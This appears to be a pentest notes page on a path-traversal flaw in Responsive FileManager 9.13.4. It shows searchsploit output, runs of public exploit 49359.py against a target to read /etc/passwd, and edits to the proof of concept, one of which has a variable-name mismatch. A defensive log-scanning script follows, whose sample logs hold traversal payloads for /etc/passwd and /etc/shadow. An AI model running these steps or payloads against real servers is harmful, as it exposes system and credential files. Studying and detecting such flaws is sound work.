# Responsive Filemanager

Responsive FileManager is a web-based file management plugin designed to integrate with rich text editors like TinyMCE or CKEditor. It provides an interface for uploading, browsing, renaming, and managing files and directories on the server through a browser. This tool is commonly used in content management systems (CMS) and custom web applications to allow users or administrators to handle media assets and documents. When improperly configured or left unpatched, it can expose sensitive file operations directly to the web, making it a potential attack surface during a web application assessment.

## LFI

Versions `9.13.4` and earlier have improper input validation on the `path` parameter. This allows an attacker with a valid session (**authenticated** access) to perform **directory traversal** by injecting relative path sequences such as `../../..`, escaping the intended file browsing directory and reading arbitrary files on the server.

{% code overflow="wrap" %}

```bash
$ searchsploit responsive file manager 9.13.4
Responsive FileManager 9.13.4 - 'path' Path Traversal | php/webapps/49359.py

$ python3 49359.py http://<target-IP>/filemanager PHPSESSID=<value> /etc/passwd
[*] Copy Clipboard
[-] Paste False
UnboundLocalError: cannot access local variable 'paste_result' where it is not associated with a value

# The PoC hardcodes the filemanager and Documents paths; check and adjust them in
# the functions below (only the changed lines are shown, unchanged lines of the
# script are omitted)
def paste_clipboard(url, session_cookie):
    # Changed path
    url_paste = "%s/filemanager/execute.php?action=paste_clipboard" % (url)

def read_file(url, file_name):
    # Changed path
    url_path = "%s/filemanager/Documents/%s" % (url, name_file)

# Successful execution of the PoC copies the target file into Documents (it can be
# seen in the UI, or in an SMB share in the case of a PHP file)
$ python3 49359.py http://apex PHPSESSID=vk5ofpj43e0ph77modoki4uo1s /etc/passwd
```

{% endcode %}
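As an added example (not code from the page or from the Responsive FileManager project), the check below scans web server access logs for requests under `/filemanager/` whose `path` parameter still contains traversal sequences after percent-decoding, which is what the exploitation above looks like from the server side. The log lines, IP addresses and the `ajax_calls.php`/`dialog.php` endpoint names are constructed for illustration; only `execute.php?action=paste_clipboard` comes from the page.

```python
import re
from urllib.parse import urlsplit, parse_qs, unquote

# Constructed Apache combined-format access log lines (not real traffic).
SAMPLE_LOG = """\
10.0.0.5 - - [10/Jan/2024:12:00:01 +0000] "GET /filemanager/dialog.php?type=0&path=Documents HTTP/1.1" 200 5120
10.0.0.9 - - [10/Jan/2024:12:00:07 +0000] "GET /filemanager/ajax_calls.php?action=copy_cut&sub_action=copy&path=../../../../etc/passwd HTTP/1.1" 200 12
10.0.0.9 - - [10/Jan/2024:12:00:08 +0000] "POST /filemanager/execute.php?action=paste_clipboard&path=Documents HTTP/1.1" 200 12
10.0.0.9 - - [10/Jan/2024:12:00:15 +0000] "GET /filemanager/ajax_calls.php?action=copy_cut&sub_action=copy&path=..%2F..%2F..%2Fetc%2Fshadow HTTP/1.1" 200 12
10.0.0.9 - - [10/Jan/2024:12:00:21 +0000] "GET /filemanager/ajax_calls.php?action=copy_cut&sub_action=copy&path=%252e%252e%252fetc%252fpasswd HTTP/1.1" 200 12
10.0.0.5 - - [10/Jan/2024:12:01:00 +0000] "GET /filemanager/Documents/report.pdf HTTP/1.1" 200 33100
"""

# Client IP, timestamp, method, request target and status from one combined-format line.
LOG_RE = re.compile(r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>[A-Z]+) (?P<target>\S+) [^"]*" (?P<status>\d{3})')


def decode_fully(value, rounds=3):
    """Undo repeated percent-encoding so %2e%2e%2f and double-encoded %252e both normalise."""
    for _ in range(rounds):
        decoded = unquote(value)
        if decoded == value:
            break
        value = decoded
    return value


def is_traversal(path_value):
    """True if the decoded path escapes the browsing root: absolute, or contains a '..' segment."""
    decoded = decode_fully(path_value).replace("\\", "/")
    if decoded.startswith("/"):
        return True
    return any(segment == ".." for segment in decoded.split("/"))


def find_traversal_attempts(log_text, app_prefix="/filemanager/"):
    """Return (ip, endpoint, decoded path, status) for each request whose path parameter traverses."""
    hits = []
    for line in log_text.splitlines():
        match = LOG_RE.match(line)
        if not match:
            continue
        parts = urlsplit(match.group("target"))
        if not parts.path.startswith(app_prefix):
            continue
        # parse_qs already decodes one layer; decode_fully handles anything nested.
        for value in parse_qs(parts.query, keep_blank_values=True).get("path", []):
            if is_traversal(value):
                hits.append((match.group("ip"), parts.path, decode_fully(value), match.group("status")))
    return hits


if __name__ == "__main__":
    for hit in find_traversal_attempts(SAMPLE_LOG):
        print("traversal attempt: ip=%s endpoint=%s path=%s status=%s" % hit)
```

A 200 status on a flagged copy request followed by a `paste_clipboard` call from the same session is the sequence worth alerting on, since a successful copy is what lands the file in `Documents`.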
